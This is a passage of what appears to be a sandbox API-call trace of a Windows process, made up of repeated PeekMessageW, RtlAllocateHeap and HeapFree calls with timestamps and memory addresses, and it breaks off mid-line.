[0071.701] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.701] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.701] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.702] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.702] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.702] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.702] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.702] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.702] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.702] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.702] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.702] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.702] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.703] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.703] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906c0 [0071.703] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906d0 [0071.703] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.703] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.703] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.703] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.703] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.703] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.704] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.704] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.704] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.704] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.704] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.704] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.704] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.704] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.704] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.704] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.704] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.705] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.705] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.705] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.705] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.705] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.705] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.705] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.705] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.705] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.705] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.705] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.705] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.705] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690670 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.706] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.706] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9398 | out: hHeap=0x650000) returned 1 [0071.706] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.706] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.706] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.706] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906a0 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906d0 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906b0 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.707] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6c9398 [0071.707] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690680 [0071.707] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0071.707] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.708] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906d0 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0071.708] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906a0 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0071.708] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) 